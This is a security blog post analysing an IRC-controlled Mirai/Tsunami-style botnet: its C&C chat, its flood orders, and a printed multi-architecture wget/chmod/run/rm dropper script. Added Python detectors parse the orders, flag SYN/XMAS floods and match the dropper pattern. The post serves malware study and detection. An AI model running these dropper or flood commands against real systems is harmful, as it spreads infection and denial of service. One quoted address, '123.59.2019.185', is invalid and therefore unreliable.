Analysis of an IRC based Botnet

This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-04-26

This blog post aims to give an insight into an IRC-based botnet, describing its network behavior and showing the analysis of its C&C. By analyzing this botnet's network traffic it was possible to identify the botmasters using an IRC channel and observe not only the conversation between them but also the orders they give to the bot.

Botnet behavior

The infected device was a Raspberry Pi (ARMv6) running Raspbian OS. The sample we executed was 49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0; the capture Id is 34-1. According to VirusTotal, the possible name for that malware sample is Mirai.

After running the malware for the first time, the device contacts the IP on port 80/TCP and downloads a file called “mips” using the GNU Wget agent. It repeats the same action to download other files. The names of the downloaded files are: mips, mipsel, sh4, x86, armv7l, armv6l, i686, powerpc, i586, m68k, sparc and armv4l.

Then, the bot establishes a connection with the IP on port 6667 and joins an IRC channel called Summit. The communication with the remote server is the following:

IP > NOTICE AUTH :*** Looking up your hostname...
IP > NOTICE AUTH :*** Found your hostname

The remote server sends a PING and our device replies with a PONG. Then, the infected device receives its first order, given by the botmaster whose nickname is AmpAttacks:

AmpAttacks :TCP Packeting!

The bot sends SYN packets with the NS flag set to port 63798. The NS flag, which stands for Nonce Sum, is still an experimental flag used to help protect against accidental or malicious concealment of marked packets from the sender [1]. The service registered for port 63798 is Apple's Xsan (Xsan Filesystem Access). This means that either the remote server was using that port for another service, or the botnet owners knew the target and the attack was aimed at an Apple device.

The domain registered to that IP is The nmap scan of that IP reveals that all ports are filtered; it also reveals that the host is up using the domain

The bot then sends an IRC packet to report the successful end of the AmpAttacks TCP flood against

IRC Packet reporting TCP Flood Against

Since our bot is on the IRC channel, it is possible to observe the conversation between the members of that channel. According to the IRC RFC [2], the format to send messages on an IRC channel is:

msgto =/ nickname / ( nickname "!" user "@" host )

Considering that format, it is possible to identify the nicknames and users in the channel; some of them are Spoof, Tragedy, Erradic and AmpAttacks.

In the conversation, the botmasters are talking about IRC. Part of the conversation is transcribed here:

IP > MODE ##Summit +q Spoof
Spoof! PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao
Spoof! PRIVMSG ##Summit :fao*
Spoof! PRIVMSG ##Summit :crazy how i know rock shit about ircs lmdao
Spoof! PRIVMSG ##Summit :fao*
Tragedy! PRIVMSG ##Summit :It's literally just a chatting program
Tragedy! PRIVMSG ##Summit :But the IRC bot forces the device to join the channel as another "client"
Tragedy! PRIVMSG ##Summit :And they listen
Tragedy! PRIVMSG ##Summit :!* makes them listen
Tragedy! MODE ##Summit +v [x86_64|BWQLXKB]
Tragedy! MODE ##Summit +v [MIPS|WGEQAV]
Tragedy! MODE ##Summit +v [ARM4T|PCVREB]
AmpAttacks! PRIVMSG ##Summit :???
Tragedy! PRIVMSG ##Summit :Giving them a voice so they can reply
Tragedy! PRIVMSG ##Summit :This is the part I need to fix
Tragedy! PRIVMSG ##Summit :!* STD 1 1

Our bot replies:

##Summit :STD Packeting!

The bot sends two kinds of packets to the IP. Those are:

  1. To the IP on port 256/UDP: bad length 4096 > 1472
    SUMMIT.. %s, STD Flood Against %s Finished!....Incorrect Usage, %s :XMAS <Target> <Port> <Time> 32 1024 10
    ....Incorrect Usage, %s :RawUDP <Target> <Time>
    .... %s :RawUDP Packeting %s!
    .. %s, RawUDP Flood Against %s Finished!
  2. To the IP ip-proto-17
    ........./bin/ .0x.0X.....Unknown error ..Success.Operation not permitted.No such file or directory.No such process.Interrupted system call.Input/output error.No such device or address.Argument list too long.Exec format error.Bad file descriptor..

For the attack on port 256/UDP, there were 2159 packets observed and for the TCP attack 2202 packets were observed.

The attacked IP is a DNS server [2]. Once the flood is finished, the bot reports to the master:

Tragedy, TCP Flood Against Finished!

Then, the conversation between the botmasters:

Tragedy! PRIVMSG ##Summit :I forgot to enable raw headers
Tragedy! PRIVMSG ##Summit :They'll say "@Tragedy : TCP Packeting"
Tragedy! PRIVMSG ##Summit :Then when the flood is over they'll say "@Tragedy, your TCP flood against has ended"
AmpAttacks! PRIVMSG ##Summit :!* TCP 53 10 32 syn 0 10

Our bot reports that it is starting the attack:

AmpAttacks :TCP Packeting!

The bot sends SYN packets to the IP on port 53. There is no registration information for this IP (Registrant Name: REDACTED FOR PRIVACY); only the country (US) and the AS (5650, Frontier Communications of America, Inc.) were available. When the bot finishes the flood, it reports it to the masters:

AmpAttacks, TCP Flood Against Finished! 421 [ARM4T|PCVREB] AmpAttacks, :Unknown command
Spoof! PRIVMSG ##Summit :eww yarn
AmpAttacks! PRIVMSG ##Summit :lol imagine saying ew to servers
Tragedy! PRIVMSG ##Summit :Googles and Amazons constantly leave and join back
Spoof! PRIVMSG ##Summit :eww servers
Spoof! PRIVMSG ##Summit :i call huawei
AmpAttacks! PRIVMSG ##Summit :because I'm constantly loading
AmpAttacks! PRIVMSG ##Summit :and dupes leave and rejoin
Attacks! PRIVMSG ##Summit :what I mean is
AmpAttacks! PRIVMSG ##Summit :the same bot
AmpAttacks! PRIVMSG ##Summit :trying to rejoin
Tragedy! PRIVMSG ##Summit :You can right click on a bot and get all its info with Whois
Spoof! PRIVMSG ##Summit :* [x86_64|ZBGMF] ( has joined ##Summit

Then, more than 10 bots join the IRC channel; those are machines from Google and Amazon that are leaving and rejoining the channel, as the botmasters discussed:

Spoof! PRIVMSG ##Summit :<~AmpAttacks> and dupes leave and rejoin
Spoof! PRIVMSG ##Summit :<~Tragedy> This doesn't allow dupes Lol the Unreal config Max per IP is set to 1. It won't let a single dupe even grab the socket
Spoof! PRIVMSG ##Summit :<~AmpAttacks> what I mean is
Spoof! PRIVMSG ##Summit :<~AmpAttacks> the same bot
Spoof! PRIVMSG ##Summit :<~AmpAttacks> trying to rejoin
Spoof! PRIVMSG ##Summit :<~Tragedy> You can right click on a bot and get all its info with Whois
Spoof! PRIVMSG ##Summit :-
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] is using modes +iwxG
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] is connecting from *
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] on ##Summit
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] using
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] has been idle 2hrs 54mins 32secs, signed on Fri Dec 21 21:57:55 2018
Spoof! PRIVMSG ##Summit :[MIPS|DINPVL] End of /WHO
Tragedy! PRIVMSG ##Summit :.ACTION .8Hits you with a swift Yeet.
Entity! PRIVMSG ##Summit :we're also testing the curl for thinkphp rn
AmpAttacks! PRIVMSG ##Summit :*die*
Tragedy! PRIVMSG ##Summit :.ACTION .4Slaps everyone with a large trout in a single swing..

Regarding our bot's name, [ARM4T|PCVREB], and the names of the bots that have joined the channel, we can assume that the bot names carry the architecture in them, for instance [MIPS|DINPVL] or [x86_64|ZBGMF]. The botmasters talked about this here:

Conversation between the botmasters
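As an added example (not part of the original post), the following Python script applies the RFC 2812 prefix format and the [ARCH|ID] naming pattern discussed above to captured IRC lines: it separates operator nicks from bot nicks, counts bots per architecture, and extracts every "!* <method> <target> ..." order. The sample lines are constructed in the shape of the transcript; the 192.0.2.x addresses are placeholders.

```python
import re
from collections import Counter
# RFC 2812 prefix: nickname [ "!" user ] [ "@" host ]; the post's captured lines
# show "Nick!" with user and host stripped, so both parts are optional here.
PREFIX_RE = re.compile(r'^(?P<nick>[^!@ ]+)(?:!(?P<user>[^@ ]*))?(?:@(?P<host>\S*))?$')
# Bot nicks embed the architecture: [ARM4T|PCVREB], [MIPS|DINPVL], [x86_64|ZBGMF]
BOT_NICK_RE = re.compile(r'^\[(?P<arch>[A-Za-z0-9_]+)\|[A-Za-z0-9]+\]$')
# Orders to every bot start with "!*", then the flood method and its arguments
ORDER_RE = re.compile(r'^!\*\s+(?P<method>\w+)\s*(?P<args>.*)$')
SAMPLE = [  # constructed, in the shape of the post's transcript; 192.0.2.x are placeholders
    "Tragedy! MODE ##Summit +v [x86_64|BWQLXKB]",
    "Tragedy! MODE ##Summit +v [MIPS|WGEQAV]",
    "Tragedy! MODE ##Summit +v [ARM4T|PCVREB]",
    "AmpAttacks! PRIVMSG ##Summit :!* TCP 192.0.2.53 53 10 32 syn 0 10",
    "shadoh! PRIVMSG ##Summit :!* XMAS 192.0.2.80 80 30 32 1024 10",
    "[ARM4T|PCVREB]! PRIVMSG ##Summit :AmpAttacks, TCP Flood Against 192.0.2.53 Finished!",
]

def parse_line(line):
    """Split 'prefix COMMAND middle :trailing' into its parts, or None if malformed."""
    prefix, _, rest = line.strip().lstrip(':').partition(' ')
    cmd, _, params = rest.partition(' ')
    m = PREFIX_RE.match(prefix)
    if not m or not cmd:
        return None
    middle, _, trailing = params.partition(' :')
    return {"nick": m["nick"], "user": m["user"] or "", "host": m["host"] or "",
            "cmd": cmd, "middle": middle, "text": trailing}

def classify_nick(nick):
    """Bots use the [ARCH|ID] pattern; any other nick is treated as an operator."""
    m = BOT_NICK_RE.match(nick)
    return ("bot", m["arch"]) if m else ("operator", None)

def parse_order(msg):
    # (nick, method, args) when a PRIVMSG carries a "!*" order, else None
    m = ORDER_RE.match(msg["text"]) if msg["cmd"] == "PRIVMSG" else None
    return (msg["nick"], m["method"], m["args"].split()) if m else None

def summarize(lines):
    """Bot nicks per architecture, operator nicks and every order seen in the capture."""
    bots, operators, orders = set(), set(), []
    for msg in filter(None, map(parse_line, lines)):
        (bots if classify_nick(msg["nick"])[0] == "bot" else operators).add(msg["nick"])
        # nicks voiced with MODE +v are bots being allowed to reply in the channel
        bots.update(t for t in msg["middle"].split() if BOT_NICK_RE.match(t))
        if (order := parse_order(msg)):
            orders.append(order)
    return {"bots": dict(Counter(classify_nick(b)[1] for b in bots)),
            "operators": operators, "orders": orders}
```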

The conversation between the botmasters continues and the bot receives more orders, botmasters that were not on the previous chat write on the channel:

Tragedy! PRIVMSG ##Summit :Theres no help cmd
shadoh! MODE ##Summit +v [x86_64|ITVX]
shadoh! PRIVMSG ##Summit :rip
Tragedy! PRIVMSG ##Summit :I didn't set the raw headers mode yet
Tragedy! PRIVMSG ##Summit :Was making sure floods worked
Tragedy! PRIVMSG ##Summit :And they do (:
shadoh! PRIVMSG ##Summit :!* XMAS 80 30 32 1024 10

The order from the botmaster specifies to perform an XMAS attack against the IP address 123.59.2019.185 on port 80. This is a DoS attack that sends packets to an IP with TCP header flags set in combinations that are harder for the target to process.

The bot sends packets to the IP on port 80. The IP is registered in China, and the network name is CloudVsp. At the moment, the IP is not active. The packet header sent by the bot looks like this:

IP > Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, length 1024: HTTP

It is possible to observe that the TCP flags set in this case are SP.U, which means that Syn, Push and Urgent are set at the same time. While the bot is attacking, it also receives more orders from the same botmaster:

shadoh! PRIVMSG ##Summit :!* XMAS 80 30 32 1024 10

The botmaster sends the same message 9 times in total; meanwhile, the conversation between the attackers continues:

Spoof! PRIVMSG ##Summit :yooo
Tragedy! PRIVMSG ##Summit :We reppin Guandong over here
Tragedy! PRIVMSG ##Summit :[IPLookup] Getting Info For ->
Tragedy! PRIVMSG ##Summit :There we go lmao
Tragedy! PRIVMSG ##Summit :For the clout
Tragedy! PRIVMSG ##Summit :<3
Tragedy! QUIT :Client has disconnected from
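As an added example (not the post's own tooling), this Python script decodes tcpdump flag strings such as the [SP.U] header shown above and flags the two patterns seen in this capture: SYN+PSH+URG packets (the botmasters' "XMAS") and bursts of SYN-only packets to one destination within the same second (the "TCP ... syn" floods). The tcpdump lines are constructed; 203.0.113.5 and the 192.0.2.x addresses are placeholders.

```python
import re
from collections import defaultdict
# tcpdump flag letters ('.' is ACK). The NS bit the post sees with SYN in the
# first flood lives in the reserved bits and is not printed by tcpdump.
FLAG_NAMES = {"S": "SYN", "F": "FIN", "P": "PSH", "R": "RST", "U": "URG",
              "E": "ECE", "W": "CWR", ".": "ACK"}
LINE_RE = re.compile(r'^(?P<ts>\d\d:\d\d:\d\d)\.\d+ IP (?P<src>\S+) > (?P<dst>\S+): '
                     r'Flags \[(?P<flags>[^\]]*)\].*?length (?P<length>\d+)')
SAMPLE = [  # constructed tcpdump -n lines in the shape of the post's capture; placeholder addresses
    "10:00:01.000100 IP 203.0.113.5.44312 > 192.0.2.80.80: Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, length 1024: HTTP",
    "10:00:01.000200 IP 203.0.113.5.44313 > 192.0.2.80.80: Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, length 1024: HTTP",
    "10:00:01.000300 IP 203.0.113.5.44314 > 192.0.2.80.80: Flags [SP.U], seq 4278190079:4278191103, ack 0, win 65279, urg 0, length 1024: HTTP",
    "10:00:02.000100 IP 203.0.113.5.50001 > 192.0.2.53.53: Flags [S], seq 1, win 65535, length 0",
    "10:00:02.000200 IP 203.0.113.5.50002 > 192.0.2.53.53: Flags [S], seq 1, win 65535, length 0",
    "10:00:02.000300 IP 203.0.113.5.50003 > 192.0.2.53.53: Flags [S], seq 1, win 65535, length 0",
    "10:00:02.000400 IP 203.0.113.5.50004 > 192.0.2.53.53: Flags [S], seq 1, win 65535, length 0",
    "10:00:03.000100 IP 203.0.113.5.50005 > 192.0.2.53.53: Flags [S], seq 1, win 65535, length 0",
    "10:00:03.000200 IP 192.0.2.53.53 > 203.0.113.5.50005: Flags [S.], seq 7, ack 2, win 65535, length 0",
    "10:00:03.000300 IP 203.0.113.5.50005 > 192.0.2.53.53: Flags [P.], seq 2:40, ack 8, win 65535, length 38",
]

def decode_flags(flag_str):
    return frozenset(FLAG_NAMES[c] for c in flag_str if c in FLAG_NAMES)

def label(flags):
    """Name the packet the way the botmasters' flood methods do, or None if ordinary."""
    if {"SYN", "PSH", "URG"} <= flags:  # SYN never legitimately travels with PSH+URG
        return "XMAS"
    if flags == {"SYN"}:  # a bare SYN is normal on its own; only the rate is suspicious
        return "SYN"
    return None

def analyze(lines, syn_rate=3):
    """Alert on any XMAS packet and on >= syn_rate bare SYNs per (src, dst, second)."""
    buckets = defaultdict(lambda: {"XMAS": 0, "SYN": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        kind = label(decode_flags(m["flags"]))
        if kind:
            src_ip = m["src"].rsplit(".", 1)[0]  # drop the source port
            buckets[(src_ip, m["dst"], m["ts"])][kind] += 1
    alerts = []
    for (src, dst, ts), c in sorted(buckets.items()):
        if c["XMAS"]:
            alerts.append((ts, src, dst, "XMAS", c["XMAS"]))
        if c["SYN"] >= syn_rate:
            alerts.append((ts, src, dst, "SYN flood", c["SYN"]))
    return alerts
```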

Then, our bot receives another order:

Spoof! PRIVMSG ##Summit :!* STD 21 25

The bot replies to inform that it will be performing the received order:

##Summit :STD Packeting!

The domain of that IP is [4]. While doing the flood, the bot sends two kinds of packets:

  1. IP address, port 5376/UDP, bad length 4096 > 1472

  2. IP address ip-proto-17

Afterwards, the bot receives more orders to perform a DoS attack on port 80:

Spoof! PRIVMSG ##Summit :!* TCP 80 22 32 syn 0 10

Our bot informs that the attack will be performed:

Spoof :TCP Packeting!

Then, the bot informs that the attack is finished:

Spoof, TCP Flood Against Finished!

In this case, the domain name registered for the IP is

After that, the bot tries to join the channel again several times, but it fails. The sequence is the following:

  1. The bot sends Syn packets to the remote server on port 6667

  2. The remote server replies with a TCP packet (P. flag):

    1. NOTICE AUTH :*** Looking up your hostname…

    2. NOTICE AUTH :*** Found your hostname

  3. The bot replies:


    2. USER VHIDFQC localhost localhost :VHIDFQC

  4. The remote server replies: 433 * [ARM4T|PCVREB] :Nickname is already in use.

After trying several times, one of the connections succeeds:

[ARM4T|PCVREB]! JOIN :##Summit

However, there seems to be a connection error: there is a ping timeout of 32 seconds. Then the remote server sends a packet with the F (FIN) flag set and the connection is over. This process is repeated several times.

The bot tries to contact the remote server on port 6667 several times, using different nicknames: first HVLLTLBT, then PCVREB. This is possible because several scripts were downloaded and executed at the same time to guarantee the botnet's operation.

Analysis for the extracted files

The files downloaded by the malware were extracted and analyzed on VirusTotal; most of them were uploaded by us for the first time. The possible name for those samples is “Tsunami”, whereas the possible name for the executed sample was “Mirai”. The executed sample downloads binaries built for different architectures. This technique ensures that the botnet will run on most IoT devices, because it downloads several binaries and runs them until one of them works.

List of the SHA256 hashes for the downloaded files by the malware:

Analysis of the Source Code of the Malware

The malware's code is a bash script that downloads several binaries, changes their mode to +x so they can be executed, executes them and then deletes them. The file names differ and most of them carry the architecture name (mips, x86, armv7, etc.).

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv7l; ./armv7l; rm -rf armv7l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv6l; ./armv6l; rm -rf armv6l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x powerpc; ./powerpc; rm -rf powerpc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x i586; ./i586; rm -rf i586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x sparc; ./sparc; rm -rf sparc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv4l; ./armv4l; rm -rf armv4l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x armv5l; ./armv5l; rm -rf armv5l
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; chmod +x 440fp; ./440fp; rm -rf 440fp
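As an added example (not from the post), this Python check recognizes the multi-architecture fetch/chmod/run/delete chain of the script above, so a defender can flag such droppers in captured shell scripts. The sample script reuses the post's lines with a placeholder download URL (http://dropper.invalid/).

```python
import re

# One dropper stage as in the script above: fetch, make executable, run, delete.
# The URL is optional so the check also matches lines where it was stripped.
STAGE_RE = re.compile(
    r'wget\s*(?P<url>[^;\s]*);\s*chmod \+x (?P<name>[^;\s]+);\s*\./(?P=name);\s*rm -rf (?P=name)')
CD_CHAIN = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /"

# Constructed from the post's script; http://dropper.invalid/ is a placeholder URL
SAMPLE_SCRIPT = "\n".join(
    f"{CD_CHAIN}; wget http://dropper.invalid/{a}; chmod +x {a}; ./{a}; rm -rf {a}"
    for a in ["mips", "mipsel", "sh4", "x86", "armv7l", "armv6l"])

def find_stages(script):
    """Return (binary name, url) for each fetch/chmod/run/delete chain in a script."""
    return [(m["name"], m["url"]) for m in STAGE_RE.finditer(script)]

def is_multiarch_dropper(script, min_stages=3):
    """A script that runs the same chain for several differently named binaries
    (one per CPU architecture) matches the Mirai/Tsunami dropper pattern."""
    return len({name for name, _ in find_stages(script)}) >= min_stages
```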


The binary file we used to infect the RPi was a bash script whose possible name, according to VirusTotal, is Mirai. It downloads files, executes them and then erases them. To do that, it contacts the server on port 80 and downloads the files using the GNU Wget agent.

Once the files were executed, the bot contacts a remote server on port 6667 and joins an IRC channel. The nickname it uses to join the channel is [ARM4T|HVLLTLBT]: it contains the architecture of the device and some random letters. Other bots join the channel with names of the same format.

Once our bot is in the channel, it receives orders to perform TCP flood attacks against different IPs.

This malware could be a variant of the Mirai botnet, because Mirai performs DDoS attacks. However, our bot doesn't seem to scan for other devices on ports 22 or 23; it just performs TCP floods against different IPs. Moreover, the samples downloaded by the malware were extracted and analyzed on VirusTotal, and the possible name for those samples is Tsunami.



[2] Internet Relay Chat: Client Protocol, RFC 2812.


[4] IP:
Registry Domain ID: 109323766_DOMAIN_COM-VRSN
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2016-12-30T19:59:34Z
Creation Date: 2004-01-04T20:57:15Z
Registrar Registration Expiration Date: 2026-01-04T20:57:15Z
Registrar:, LLC
Registrar IANA ID: 146
NetRange: -
NetHandle: NET-74-91-117-0-1
Parent: NFOSERVERS-1 (NET-74-91-112-0-1)
NetType: Reassigned
OriginAS: AS32751
Customer: Nuclearfallout Enterprises, Inc. (C02882606)


This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.

Thanks to Veronica Valeros for her help in the analysis and writing corrections.